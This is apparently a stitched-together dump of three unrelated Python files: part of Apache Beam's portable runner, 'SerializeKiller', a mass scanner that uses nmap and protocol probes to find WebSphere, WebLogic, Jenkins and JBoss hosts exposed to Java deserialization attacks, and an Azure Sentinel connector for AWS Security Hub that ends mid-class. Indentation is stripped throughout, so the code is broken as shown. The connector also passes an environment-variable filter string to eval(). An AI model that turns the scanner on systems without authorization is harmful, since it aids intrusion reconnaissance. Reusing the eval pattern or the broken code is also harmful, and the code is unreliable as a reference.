self.control_handler = BeamFnControlServicer()
beam_fn_api_pb2_grpc.add_BeamFnControlServicer_to_server(
self.control_handler, self.control_server)
# If we have provision info, serve these off the control port as well.
if self.provision_info:
if self.provision_info.provision_info:
provision_info = self.provision_info.provision_info
if not provision_info.worker_id:
provision_info = copy.copy(provision_info)
provision_info.worker_id = str(uuid.uuid4())
beam_provision_api_pb2_grpc.add_ProvisionServiceServicer_to_server(
BasicProvisionService(self.provision_info.provision_info),
self.control_server)
if self.provision_info.artifact_staging_dir:
m = beam_artifact_api_pb2_grpc
m.add_ArtifactRetrievalServiceServicer_to_server(
artifact_service.BeamFilesystemArtifactService(
self.provision_info.artifact_staging_dir),
self.control_server)
self.data_plane_handler = data_plane.BeamFnDataServicer()
beam_fn_api_pb2_grpc.add_BeamFnDataServicer_to_server(
self.data_plane_handler, self.data_server)
beam_fn_api_pb2_grpc.add_BeamFnStateServicer_to_server(
FnApiRunner.GrpcStateServicer(state),
self.state_server)
self.logging_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=2),
options=no_max_message_sizes)
self.logging_port = self.logging_server.add_insecure_port('[::]:0')
beam_fn_api_pb2_grpc.add_BeamFnLoggingServicer_to_server(
BasicLoggingService(),
self.logging_server)
logging.info('starting control server on port %s', self.control_port)
logging.info('starting data server on port %s', self.data_port)
logging.info('starting state server on port %s', self.state_port)
logging.info('starting logging server on port %s', self.logging_port)
self.logging_server.start()
self.state_server.start()
self.data_server.start()
self.control_server.start()
def close(self):
self.control_handler.done()
to_wait = [
self.control_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.data_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.state_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.logging_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS)
]
for w in to_wait:
w.wait()
class GrpcWorkerHandler(WorkerHandler):
"""An grpc based worker_handler for fn API control, state and data planes."""
def __init__(self, state, provision_info, grpc_server):
self._grpc_server = grpc_server
super(GrpcWorkerHandler, self).__init__(
self._grpc_server.control_handler, self._grpc_server.data_plane_handler,
state, provision_info)
self.state = state
self.control_address = self._grpc_server.control_address
self.control_conn = self._grpc_server.control_handler \
.get_conn_by_worker_id(self.worker_id)
self.data_conn = self._grpc_server.data_plane_handler \
.get_conn_by_worker_id(self.worker_id)
def data_api_service_descriptor(self):
return endpoints_pb2.ApiServiceDescriptor(
url='localhost:%s' % self._grpc_server.data_port)
def state_api_service_descriptor(self):
return endpoints_pb2.ApiServiceDescriptor(
url='localhost:%s' % self._grpc_server.state_port)
def logging_api_service_descriptor(self):
return endpoints_pb2.ApiServiceDescriptor(
url='localhost:%s' % self._grpc_server.logging_port)
def close(self):
self.control_conn.close()
self.data_conn.close()
super(GrpcWorkerHandler, self).close()
@WorkerHandler.register_environment(
common_urns.environments.EXTERNAL.urn, beam_runner_api_pb2.ExternalPayload)
class ExternalWorkerHandler(GrpcWorkerHandler):
def __init__(self, external_payload, state, provision_info, grpc_server):
super(ExternalWorkerHandler, self).__init__(state, provision_info,
grpc_server)
self._external_payload = external_payload
def start_worker(self):
stub = beam_fn_api_pb2_grpc.BeamFnExternalWorkerPoolStub(
GRPCChannelFactory.insecure_channel(
self._external_payload.endpoint.url))
response = stub.NotifyRunnerAvailable(
beam_fn_api_pb2.NotifyRunnerAvailableRequest(
worker_id=self.worker_id,
control_endpoint=endpoints_pb2.ApiServiceDescriptor(
url=self.control_address),
logging_endpoint=self.logging_api_service_descriptor(),
params=self._external_payload.params))
if response.error:
raise RuntimeError("Error starting worker: %s" % response.error)
def stop_worker(self):
pass
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON_GRPC, bytes)
class EmbeddedGrpcWorkerHandler(GrpcWorkerHandler):
def __init__(self, num_workers_payload, state, provision_info, grpc_server):
super(EmbeddedGrpcWorkerHandler, self).__init__(state, provision_info,
grpc_server)
self._num_threads = int(num_workers_payload) if num_workers_payload else 1
def start_worker(self):
self.worker = sdk_worker.SdkHarness(
self.control_address, worker_count=self._num_threads,
worker_id=self.worker_id)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.daemon = True
self.worker_thread.start()
def stop_worker(self):
self.worker_thread.join()
@WorkerHandler.register_environment(python_urns.SUBPROCESS_SDK, bytes)
class SubprocessSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self, worker_command_line, state, provision_info, grpc_server):
super(SubprocessSdkWorkerHandler, self).__init__(state, provision_info,
grpc_server)
self._worker_command_line = worker_command_line
def start_worker(self):
from apache_beam.runners.portability import local_job_service
self.worker = local_job_service.SubprocessSdkWorker(
self._worker_command_line, self.control_address, self.worker_id)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.start()
def stop_worker(self):
self.worker_thread.join()
@WorkerHandler.register_environment(common_urns.environments.DOCKER.urn,
beam_runner_api_pb2.DockerPayload)
class DockerSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self, payload, state, provision_info, grpc_server):
super(DockerSdkWorkerHandler, self).__init__(state, provision_info,
grpc_server)
self._container_image = payload.container_image
self._container_id = None
def start_worker(self):
try:
subprocess.check_call(['docker', 'pull', self._container_image])
except Exception:
      logging.info('Unable to pull image %s', self._container_image)
self._container_id = subprocess.check_output(
['docker',
'run',
'-d',
# TODO: credentials
'--network=host',
self._container_image,
'--id=%s' % uuid.uuid4(),
'--logging_endpoint=%s' % self.logging_api_service_descriptor().url,
'--control_endpoint=%s' % self.control_address,
'--artifact_endpoint=%s' % self.control_address,
'--provision_endpoint=%s' % self.control_address,
]).strip()
while True:
logging.info('Waiting for docker to start up...')
status = subprocess.check_output([
'docker',
'inspect',
'-f',
'{{.State.Status}}',
self._container_id]).strip()
if status == 'running':
break
elif status in ('dead', 'exited'):
subprocess.call([
'docker',
'container',
'logs',
self._container_id])
raise RuntimeError('SDK failed to start.')
time.sleep(1)
def stop_worker(self):
if self._container_id:
subprocess.call([
'docker',
'kill',
self._container_id])
class WorkerHandlerManager(object):
def __init__(self, environments, job_provision_info=None):
self._environments = environments
self._job_provision_info = job_provision_info
self._cached_handlers = collections.defaultdict(list)
self._state = FnApiRunner.StateServicer() # rename?
self._grpc_server = None
def get_worker_handlers(self, environment_id, num_workers):
if environment_id is None:
# Any environment will do, pick one arbitrarily.
environment_id = next(iter(self._environments.keys()))
environment = self._environments[environment_id]
# assume it's using grpc if environment is not EMBEDDED_PYTHON.
if environment.urn != python_urns.EMBEDDED_PYTHON and \
self._grpc_server is None:
self._grpc_server = GrpcServer(self._state, self._job_provision_info)
worker_handler_list = self._cached_handlers[environment_id]
if len(worker_handler_list) < num_workers:
for _ in range(len(worker_handler_list), num_workers):
worker_handler = WorkerHandler.create(
environment, self._state, self._job_provision_info,
self._grpc_server)
self._cached_handlers[environment_id].append(worker_handler)
worker_handler.start_worker()
return self._cached_handlers[environment_id][:num_workers]
def close_all(self):
for worker_handler_list in self._cached_handlers.values():
for worker_handler in set(worker_handler_list):
try:
worker_handler.close()
except Exception:
logging.error("Error closing worker_handler %s" % worker_handler,
exc_info=True)
self._cached_handlers = {}
if self._grpc_server is not None:
self._grpc_server.close()
self._grpc_server = None
class ExtendedProvisionInfo(object):
def __init__(self, provision_info=None, artifact_staging_dir=None):
self.provision_info = (
provision_info or beam_provision_api_pb2.ProvisionInfo())
self.artifact_staging_dir = artifact_staging_dir
_split_managers = []
@contextlib.contextmanager
def split_manager(stage_name, split_manager):
"""Registers a split manager to control the flow of elements to a given stage.
Used for testing.
A split manager should be a coroutine yielding desired split fractions,
receiving the corresponding split results. Currently, only one input is
supported.
"""
try:
_split_managers.append((stage_name, split_manager))
yield
finally:
_split_managers.pop()
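# Illustrative sketch (testing aid, not executed here): a split manager is a
# generator/coroutine that yields the fraction of remaining work to split off
# and receives the corresponding split result back. The names below are
# hypothetical.
#
#   def halve_once(num_elements):
#       # Ask the SDK to split off half of the remaining elements, then stop.
#       split_result = yield 0.5
#
#   with split_manager('MyStage', halve_once):
#       run_pipeline_under_test()  # whatever drives the bundle being tested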
class BundleManager(object):
"""Manages the execution of a bundle from the runner-side.
This class receives a bundle descriptor, and performs the following tasks:
- Registration of the bundle with the worker.
- Splitting of the bundle
- Setting up any other bundle requirements (e.g. side inputs).
- Submitting the bundle to worker for execution
- Passing bundle input data to the worker
- Collecting bundle output data from the worker
- Finalizing the bundle.
"""
_uid_counter = 0
_lock = threading.Lock()
def __init__(
self, worker_handler_list, get_buffer, get_input_coder_impl,
bundle_descriptor, progress_frequency=None, skip_registration=False):
"""Set up a bundle manager.
Args:
worker_handler_list
get_buffer (Callable[[str], list])
get_input_coder_impl (Callable[[str], Coder])
bundle_descriptor (beam_fn_api_pb2.ProcessBundleDescriptor)
progress_frequency
skip_registration
"""
self._worker_handler_list = worker_handler_list
self._get_buffer = get_buffer
self._get_input_coder_impl = get_input_coder_impl
self._bundle_descriptor = bundle_descriptor
self._registered = skip_registration
self._progress_frequency = progress_frequency
self._worker_handler = None
def _send_input_to_worker(self,
process_bundle_id,
read_transform_id,
byte_streams):
data_out = self._worker_handler.data_conn.output_stream(
process_bundle_id, read_transform_id)
for byte_stream in byte_streams:
data_out.write(byte_stream)
data_out.close()
def _register_bundle_descriptor(self):
if self._registered:
registration_future = None
else:
process_bundle_registration = beam_fn_api_pb2.InstructionRequest(
register=beam_fn_api_pb2.RegisterRequest(
process_bundle_descriptor=[self._bundle_descriptor]))
registration_future = self._worker_handler.control_conn.push(
process_bundle_registration)
self._registered = True
return registration_future
def _select_split_manager(self):
"""TODO(pabloem) WHAT DOES THIS DO"""
unique_names = set(
t.unique_name for t in self._bundle_descriptor.transforms.values())
for stage_name, candidate in reversed(_split_managers):
if (stage_name in unique_names
or (stage_name + '/Process') in unique_names):
split_manager = candidate
break
else:
split_manager = None
return split_manager
def _generate_splits_for_testing(self,
split_manager,
inputs,
process_bundle_id):
split_results = []
read_transform_id, buffer_data = only_element(inputs.items())
byte_stream = b''.join(buffer_data)
num_elements = len(list(
self._get_input_coder_impl(read_transform_id).decode_all(byte_stream)))
# Start the split manager in case it wants to set any breakpoints.
split_manager_generator = split_manager(num_elements)
try:
split_fraction = next(split_manager_generator)
done = False
except StopIteration:
done = True
# Send all the data.
self._send_input_to_worker(
process_bundle_id, read_transform_id, [byte_stream])
# Execute the requested splits.
while not done:
if split_fraction is None:
split_result = None
else:
split_request = beam_fn_api_pb2.InstructionRequest(
process_bundle_split=
beam_fn_api_pb2.ProcessBundleSplitRequest(
instruction_reference=process_bundle_id,
desired_splits={
read_transform_id:
beam_fn_api_pb2.ProcessBundleSplitRequest.DesiredSplit(
fraction_of_remainder=split_fraction,
estimated_input_elements=num_elements)
}))
split_response = self._worker_handler.control_conn.push(
split_request).get()
for t in (0.05, 0.1, 0.2):
waiting = ('Instruction not running', 'not yet scheduled')
if any(msg in split_response.error for msg in waiting):
time.sleep(t)
split_response = self._worker_handler.control_conn.push(
split_request).get()
if 'Unknown process bundle' in split_response.error:
# It may have finished too fast.
split_result = None
elif split_response.error:
raise RuntimeError(split_response.error)
else:
split_result = split_response.process_bundle_split
split_results.append(split_result)
try:
split_fraction = split_manager_generator.send(split_result)
except StopIteration:
break
return split_results
def process_bundle(self, inputs, expected_outputs):
# Unique id for the instruction processing this bundle.
with BundleManager._lock:
BundleManager._uid_counter += 1
process_bundle_id = 'bundle_%s' % BundleManager._uid_counter
self._worker_handler = self._worker_handler_list[
BundleManager._uid_counter % len(self._worker_handler_list)]
# Register the bundle descriptor, if needed - noop if already registered.
registration_future = self._register_bundle_descriptor()
# Check that the bundle was successfully registered.
if registration_future and registration_future.get().error:
raise RuntimeError(registration_future.get().error)
split_manager = self._select_split_manager()
if not split_manager:
# If there is no split_manager, write all input data to the channel.
for transform_id, elements in inputs.items():
self._send_input_to_worker(
process_bundle_id, transform_id, elements)
# Actually start the bundle.
process_bundle_req = beam_fn_api_pb2.InstructionRequest(
instruction_id=process_bundle_id,
process_bundle=beam_fn_api_pb2.ProcessBundleRequest(
process_bundle_descriptor_reference=self._bundle_descriptor.id))
result_future = self._worker_handler.control_conn.push(process_bundle_req)
split_results = []
with ProgressRequester(
self._worker_handler, process_bundle_id, self._progress_frequency):
if split_manager:
split_results = self._generate_splits_for_testing(
split_manager, inputs, process_bundle_id)
# Gather all output data.
for output in self._worker_handler.data_conn.input_elements(
process_bundle_id,
expected_outputs.keys(),
abort_callback=lambda: (result_future.is_done()
and result_future.get().error)):
if output.ptransform_id in expected_outputs:
with BundleManager._lock:
self._get_buffer(
expected_outputs[output.ptransform_id]).append(output.data)
logging.debug('Wait for the bundle %s to finish.' % process_bundle_id)
result = result_future.get()
if result.error:
raise RuntimeError(result.error)
if result.process_bundle.requires_finalization:
finalize_request = beam_fn_api_pb2.InstructionRequest(
finalize_bundle=
beam_fn_api_pb2.FinalizeBundleRequest(
instruction_reference=process_bundle_id
))
self._worker_handler.control_conn.push(finalize_request)
return result, split_results
class ParallelBundleManager(BundleManager):
def __init__(
self, worker_handler_list, get_buffer, get_input_coder_impl,
bundle_descriptor, progress_frequency=None, skip_registration=False,
**kwargs):
super(ParallelBundleManager, self).__init__(
worker_handler_list, get_buffer, get_input_coder_impl,
bundle_descriptor, progress_frequency, skip_registration)
self._num_workers = kwargs.pop('num_workers', 1)
def process_bundle(self, inputs, expected_outputs):
part_inputs = [{} for _ in range(self._num_workers)]
for name, input in inputs.items():
for ix, part in enumerate(input.partition(self._num_workers)):
part_inputs[ix][name] = part
merged_result = None
split_result_list = []
with futures.ThreadPoolExecutor(max_workers=self._num_workers) as executor:
for result, split_result in executor.map(lambda part: BundleManager(
self._worker_handler_list, self._get_buffer,
self._get_input_coder_impl, self._bundle_descriptor,
self._progress_frequency, self._registered).process_bundle(
part, expected_outputs), part_inputs):
split_result_list += split_result
if merged_result is None:
merged_result = result
else:
merged_result = beam_fn_api_pb2.InstructionResponse(
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
monitoring_infos=monitoring_infos.consolidate(
itertools.chain(
result.process_bundle.monitoring_infos,
merged_result.process_bundle.monitoring_infos))),
error=result.error or merged_result.error)
return merged_result, split_result_list
class ProgressRequester(threading.Thread):
""" Thread that asks SDK Worker for progress reports with a certain frequency.
A callback can be passed to call with progress updates.
"""
def __init__(self, worker_handler, instruction_id, frequency, callback=None):
super(ProgressRequester, self).__init__()
self._worker_handler = worker_handler
self._instruction_id = instruction_id
self._frequency = frequency
self._done = False
self._latest_progress = None
self._callback = callback
self.daemon = True
def __enter__(self):
if self._frequency:
self.start()
def __exit__(self, *unused_exc_info):
if self._frequency:
self.stop()
def run(self):
while not self._done:
try:
progress_result = self._worker_handler.control_conn.push(
beam_fn_api_pb2.InstructionRequest(
process_bundle_progress=
beam_fn_api_pb2.ProcessBundleProgressRequest(
instruction_reference=self._instruction_id))).get()
self._latest_progress = progress_result.process_bundle_progress
if self._callback:
self._callback(self._latest_progress)
except Exception as exn:
logging.error("Bad progress: %s", exn)
time.sleep(self._frequency)
def stop(self):
self._done = True
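# Illustrative sketch: ProgressRequester is used as a context manager around a
# running bundle; `on_progress` is a hypothetical callback invoked with each
# progress response roughly every `frequency` seconds.
#
#   def on_progress(progress_response):
#       print(progress_response)
#
#   with ProgressRequester(worker_handler, 'bundle_1', 0.5, on_progress):
#       result = result_future.get()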
class ControlFuture(object):
def __init__(self, instruction_id, response=None):
self.instruction_id = instruction_id
if response:
self._response = response
else:
self._response = None
self._condition = threading.Condition()
def is_done(self):
return self._response is not None
def set(self, response):
with self._condition:
self._response = response
self._condition.notify_all()
def get(self, timeout=None):
if not self._response:
with self._condition:
if not self._response:
self._condition.wait(timeout)
return self._response
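# Illustrative sketch: ControlFuture is a minimal hand-off between the control
# service (which eventually calls set()) and the caller blocking in get().
# The names below are examples only.
#
#   future = ControlFuture('instruction-1')
#   threading.Thread(target=lambda: future.set(some_response)).start()
#   response = future.get(timeout=30)  # blocks until set() is called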
class FnApiMetrics(metrics.metric.MetricResults):
def __init__(self, step_monitoring_infos, user_metrics_only=True):
"""Used for querying metrics from the PipelineResult object.
step_monitoring_infos: Per step metrics specified as MonitoringInfos.
user_metrics_only: If true, return only the user metrics derived from the
step_monitoring_infos.
"""
self._counters = {}
self._distributions = {}
self._gauges = {}
self._user_metrics_only = user_metrics_only
self._init_metrics_from_monitoring_infos(step_monitoring_infos)
self._monitoring_infos = step_monitoring_infos
def _init_metrics_from_monitoring_infos(self, step_monitoring_infos):
for smi in step_monitoring_infos.values():
# Only include user metrics.
for mi in smi:
if (self._user_metrics_only and
not monitoring_infos.is_user_monitoring_info(mi)):
continue
key = self._to_metric_key(mi)
if monitoring_infos.is_counter(mi):
self._counters[key] = (
monitoring_infos.extract_metric_result_map_value(mi))
elif monitoring_infos.is_distribution(mi):
self._distributions[key] = (
monitoring_infos.extract_metric_result_map_value(mi))
elif monitoring_infos.is_gauge(mi):
self._gauges[key] = (
monitoring_infos.extract_metric_result_map_value(mi))
def _to_metric_key(self, monitoring_info):
# Right now this assumes that all metrics have a PTRANSFORM
ptransform_id = monitoring_info.labels['PTRANSFORM']
namespace, name = monitoring_infos.parse_namespace_and_name(monitoring_info)
return MetricKey(ptransform_id, MetricName(namespace, name))
def query(self, filter=None):
counters = [metrics.execution.MetricResult(k, v, v)
for k, v in self._counters.items()
if self.matches(filter, k)]
distributions = [metrics.execution.MetricResult(k, v, v)
for k, v in self._distributions.items()
if self.matches(filter, k)]
gauges = [metrics.execution.MetricResult(k, v, v)
for k, v in self._gauges.items()
if self.matches(filter, k)]
return {self.COUNTERS: counters,
self.DISTRIBUTIONS: distributions,
self.GAUGES: gauges}
def monitoring_infos(self):
return [item for sublist in self._monitoring_infos.values() for item in
sublist]
class RunnerResult(runner.PipelineResult):
def __init__(self, state, monitoring_infos_by_stage, metrics_by_stage):
super(RunnerResult, self).__init__(state)
self._monitoring_infos_by_stage = monitoring_infos_by_stage
self._metrics_by_stage = metrics_by_stage
self._metrics = None
self._monitoring_metrics = None
def wait_until_finish(self, duration=None):
return self._state
def metrics(self):
"""Returns a queryable object including user metrics only."""
if self._metrics is None:
self._metrics = FnApiMetrics(
self._monitoring_infos_by_stage, user_metrics_only=True)
return self._metrics
def monitoring_metrics(self):
"""Returns a queryable object including all metrics."""
if self._monitoring_metrics is None:
self._monitoring_metrics = FnApiMetrics(
self._monitoring_infos_by_stage, user_metrics_only=False)
return self._monitoring_metrics
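# Illustrative sketch: after running a pipeline on this runner, user metrics can
# be queried from the returned RunnerResult (a sketch assuming the standard
# apache_beam.metrics API; `result` is a hypothetical RunnerResult instance):
#
#   from apache_beam.metrics.metric import MetricsFilter
#   query_result = result.metrics().query(MetricsFilter().with_name('my_counter'))
#   counters = query_result['counters']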
|
serializekiller.py
|
#!/usr/bin/env python
#-------------------------------------------------------------------------------
# Name: SerializeKiller
# Purpose:     Finding vulnerable servers
#
# Author: (c) John de Kroon, 2015
# Version: 1.0.2
#-------------------------------------------------------------------------------
import subprocess
import threading
import time
import socket
import sys
import argparse
import urllib2
import ssl
from socket import error as socket_error
from datetime import datetime
import thread
mutex = thread.allocate_lock()
parser = argparse.ArgumentParser(prog='serializekiller.py',
formatter_class=argparse.RawDescriptionHelpFormatter,
description="Scan for Java Deserialization vulnerability.")
parser.add_argument('--url', nargs='?', help="Scan a single URL")
parser.add_argument('file', nargs='?', help='File with targets')
args = parser.parse_args()
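# Example invocations (sketch):
#   python serializekiller.py targets.txt          # scan every host in a file
#   python serializekiller.py --url example.com    # scan a single host
# A targets file lists one entry per line, either a bare host or host:port.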
def nmap(host, *args):
global shellCounter
global threads
global target_list
# are there any ports defined for this host?
if not target_list[host]:
found = False
cmd = 'nmap --host-timeout 5 --open -p 5005,8080,9080,8880,8887,7001,7002,16200 '+host
try:
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
out, err = p.communicate()
if "5005" in out:
if websphere(host, "5005"):
found = True
if "8880" in out:
if websphere(host, "8880"):
found = True
if "8887" in out:
if websphere(host, "8887"):
found = True
if "7001" in out:
if weblogic(host, 7001):
found = True
if "16200" in out:
if weblogic(host, 16200):
found = True
if "8080" in out:
if jenkins(host, "8080"):
found = True
if jboss(host, "8080"):
found = True
if "9080" in out:
if jenkins(host, "9080"):
found = True
if found:
shellCounter += 1
except ValueError:
print " ! Something went wrong on host: "+host
return
else:
for port in target_list[host]:
if websphere(host, port) or weblogic(host, port) or jenkins(host, port) or jboss(host, port):
shellCounter += 1
return
def websphere(url, port, retry=False):
try:
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
output = urllib2.urlopen('https://'+url+":"+port, context=ctx, timeout=8).read()
if "rO0AB" in output:
mutex.acquire()
print " - (possibly) Vulnerable Websphere: "+url+" ("+port+")"
mutex.release()
return True
except urllib2.HTTPError, e:
if e.getcode() == 500:
if "rO0AB" in e.read():
mutex.acquire()
print " - (possibly) Vulnerable Websphere: "+url+" ("+port+")"
mutex.release()
return True
except:
pass
try:
output = urllib2.urlopen('http://'+url+":"+port, timeout=3).read()
if "rO0AB" in output:
mutex.acquire()
print " - (possibly) Vulnerable Websphere: "+url+" ("+port+")"
mutex.release()
return True
except urllib2.HTTPError, e:
if e.getcode() == 500:
if "rO0AB" in e.read():
mutex.acquire()
print " - (possibly) Vulnerable Websphere: "+url+" ("+port+")"
mutex.release()
return True
except:
pass
#Used this part from https://github.com/foxglovesec/JavaUnserializeExploits
def weblogic(url, port):
try:
server_address = (url, int(port))
sock = socket.create_connection(server_address, 4)
sock.settimeout(2)
# Send headers
headers = 't3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
sock.sendall(headers)
try:
data = sock.recv(1024)
except socket.timeout:
return False
sock.close()
if "HELO" in data:
mutex.acquire()
print " - Vulnerable Weblogic: "+url+" ("+str(port)+")"
mutex.release()
return True
return False
except socket_error:
return False
#Used something from https://github.com/foxglovesec/JavaUnserializeExploits
def jenkins(url, port):
try:
cli_port = False
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
try:
output = urllib2.urlopen('https://'+url+':'+port+"/jenkins/", context=ctx, timeout=8).info()
cli_port = int(output['X-Jenkins-CLI-Port'])
except urllib2.HTTPError, e:
if e.getcode() == 404:
try:
output = urllib2.urlopen('https://'+url+':'+port, context=ctx, timeout=8).info()
cli_port = int(output['X-Jenkins-CLI-Port'])
except:
pass
except:
pass
except:
mutex.acquire()
print " ! Could not check Jenkins on https. Maybe your SSL lib is broken."
mutex.release()
pass
if cli_port is False:
try:
output = urllib2.urlopen('http://'+url+':'+port+"/jenkins/", timeout=8).info()
cli_port = int(output['X-Jenkins-CLI-Port'])
except urllib2.HTTPError, e:
if e.getcode() == 404:
try:
output = urllib2.urlopen('http://'+url+':'+port, timeout=8).info()
cli_port = int(output['X-Jenkins-CLI-Port'])
except:
return False
except:
return False
#Open a socket to the CLI port
try:
server_address = (url, cli_port)
sock = socket.create_connection(server_address, 5)
# Send headers
headers = '\x00\x14\x50\x72\x6f\x74\x6f\x63\x6f\x6c\x3a\x43\x4c\x49\x2d\x63\x6f\x6e\x6e\x65\x63\x74'
sock.send(headers)
data1 =sock.recv(1024)
if "rO0AB" in data1:
mutex.acquire()
print " - Vulnerable Jenkins: "+url+" ("+str(port)+")"
mutex.release()
return True
else:
data2 = sock.recv(1024)
if "rO0AB" in data2:
mutex.acquire()
print " - Vulnerable Jenkins: "+url+" ("+str(port)+")"
mutex.release()
return True
except:
pass
return False
def jboss(url, port, retry = False):
try:
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
output = urllib2.urlopen('https://'+url+':'+port+"/invoker/JMXInvokerServlet", context=ctx, timeout=8).read()
except:
try:
output = urllib2.urlopen('http://'+url+':'+port+"/invoker/JMXInvokerServlet", timeout=8).read()
except:
#OK. I give up.
return False
if "\xac\xed\x00\x05" in output:
mutex.acquire()
print " - Vulnerable JBOSS: "+url+" ("+port+")"
mutex.release()
return True
return False
def urlStripper(url):
url = str(url.replace("https:", ''))
url = str(url.replace("http:", ''))
url = str(url.replace("\r", ''))
url = str(url.replace("\n", ''))
url = str(url.replace("/", ''))
return url
def read_file(filename):
f = open(filename)
content = f.readlines()
f.close()
return content
def worker():
global threads
content = read_file(args.file)
for line in content:
if ":" in line:
item = line.strip().split(':')
if item[0] not in target_list:
target_list[item[0]] = [item[1]]
else:
target_list[item[0]].append(item[1])
else:
if line.strip() not in target_list:
target_list[line.strip()] = []
print str(len(target_list)) + " targets found."
total_jobs = len(target_list)
current = 0
for host in target_list:
current += 1
while threading.active_count() > threads:
mutex.acquire()
print " ! We have more threads running than allowed. Current: {} Max: {}.".format(threading.active_count(),
threads)
mutex.release()
if threads < 100:
threads+=1
sys.stdout.flush()
time.sleep(2)
mutex.acquire()
print " # Starting test {} of {} on {}.".format(current, total_jobs, host)
sys.stdout.flush()
mutex.release()
threading.Thread(target=nmap, args=(host, False, 1)).start()
#we're done!
while threading.active_count() > 2:
mutex.acquire()
print " # Waiting for everybody to come back. Still {} active.".format(threading.active_count() - 1)
sys.stdout.flush()
mutex.release()
time.sleep(4)
mutex.acquire()
print
print " => scan done. "+str(shellCounter)+" vulnerable hosts found."
print "Execution time: "+str(datetime.now() - startTime)
mutex.release()
exit()
if __name__ == '__main__':
startTime = datetime.now()
mutex.acquire()
print "Start SerializeKiller..."
print "This could take a while. Be patient."
print
mutex.release()
try:
ssl.create_default_context()
except:
print " ! WARNING: Your SSL lib isn't supported. Results might be incomplete."
pass
target_list = {}
shellCounter = 0
if args.url:
target_list[urlStripper(args.url)] = []
nmap(urlStripper(args.url))
elif args.file:
threads = 30
worker()
else:
mutex.acquire()
print "ERROR: Specify a file or a url!"
mutex.release()
|
__init__.py
|
import requests
import datetime
import dateutil.parser
import dateutil.tz
import logging
import boto3
import gzip
import io
import csv
import time
import os
import sys
import json
import re
import hashlib
import hmac
import base64
from threading import Thread
from io import StringIO
import azure.functions as func
sentinel_customer_id = os.environ.get('WorkspaceID')
sentinel_shared_key = os.environ.get('WorkspaceKey')
aws_access_key_id = os.environ.get('AWSAccessKeyId')
aws_secret_acces_key = os.environ.get('AWSSecretAccessKey')
aws_region_name = os.environ.get('AWSRegionName')
aws_securityhub_filters = os.environ.get('SecurityHubFilters')
sentinel_log_type = os.environ.get('LogAnalyticsCustomLogName')
fresh_event_timestamp = os.environ.get('FreshEventTimeStamp')
logAnalyticsUri = os.environ.get('LAURI')
if ((logAnalyticsUri in (None, '') or str(logAnalyticsUri).isspace())):
logAnalyticsUri = 'https://' + sentinel_customer_id + '.ods.opinsights.azure.com'
pattern = r'https:\/\/([\w\-]+)\.ods\.opinsights\.azure.([a-zA-Z\.]+)$'
match = re.match(pattern,str(logAnalyticsUri))
if(not match):
raise Exception("AWSSecurityHubFindingsDataconnector: Invalid Log Analytics Uri.")
def main(mytimer: func.TimerRequest) -> None:
if mytimer.past_due:
logging.info('The timer is past due!')
logging.info('Starting program')
sentinel = AzureSentinelConnector(logAnalyticsUri, sentinel_customer_id, sentinel_shared_key, sentinel_log_type, queue_size=10000, bulks_number=10)
securityHubSession = SecurityHubClient(aws_access_key_id, aws_secret_acces_key, aws_region_name)
securityhub_filters_dict = {}
logging.info ('SecurityHubFilters : {0}'.format(aws_securityhub_filters))
if aws_securityhub_filters:
securityhub_filters = aws_securityhub_filters.replace("\'", "\"")
securityhub_filters_dict = eval(securityhub_filters)
results = securityHubSession.getFindings(securityhub_filters_dict)
fresh_events_after_this_time = securityHubSession.freshEventTimestampGenerator(int(fresh_event_timestamp))
fresh_events = True
first_call = True
failed_sent_events_number = 0
successfull_sent_events_number = 0
while ((first_call or 'NextToken' in results) and fresh_events):
# Loop through all findings (100 per page) returned by Security Hub API call
# Break out of the loop when we have looked back across the last hour of events (based on the finding's LastObservedAt timestamp)
first_call = False
for finding in results['Findings']:
finding_timestamp = securityHubSession.findingTimestampGenerator(finding['LastObservedAt'])
if (finding_timestamp > fresh_events_after_this_time):
logging.info ('SecurityHub Finding:{0}'.format(json.dumps(finding)))
payload = {}
payload.update({'SchemaVersion':finding['SchemaVersion']})
payload.update({'Id':finding['Id']})
payload.update({'ProductArn':finding['ProductArn']})
payload.update({'GeneratorId':finding['GeneratorId']})
payload.update({'AwsAccountId':finding['AwsAccountId']})
payload.update({'Types':finding['Types']})
payload.update({'FirstObservedAt':finding['FirstObservedAt']})
payload.update({'LastObservedAt':finding['LastObservedAt']})
payload.update({'UpdatedAt':finding['UpdatedAt']})
payload.update({'Severity':json.dumps(finding['Severity'], sort_keys=True)})
payload.update({'Title':finding['Title']})
payload.update({'ProductFields':json.dumps(finding['ProductFields'], sort_keys=True)})
payload.update({'ProductArn':finding['ProductArn']})
payload.update({'CreatedAt':finding['CreatedAt']})
payload.update({'Resources':finding['Resources']})
payload.update({'WorkflowState':finding['WorkflowState']})
payload.update({'RecordState':finding['RecordState']})
with sentinel:
sentinel.send(payload)
failed_sent_events_number = sentinel.failed_sent_events_number
successfull_sent_events_number = sentinel.successfull_sent_events_number
else:
fresh_events = False
break
if (fresh_events and 'NextToken' in results):
results = securityHubSession.getFindingsWithToken(results['NextToken'], securityhub_filters_dict)
if failed_sent_events_number:
logging.error('{} events have not been sent'.format(failed_sent_events_number))
if successfull_sent_events_number:
logging.info('Program finished. {} events have been sent. {} events have not been sent'.format(successfull_sent_events_number, failed_sent_events_number))
if successfull_sent_events_number == 0 and failed_sent_events_number == 0:
logging.info('No Fresh SecurityHub Events')
class SecurityHubClient:
def __init__(self, aws_access_key_id, aws_secret_acces_key, aws_region_name):
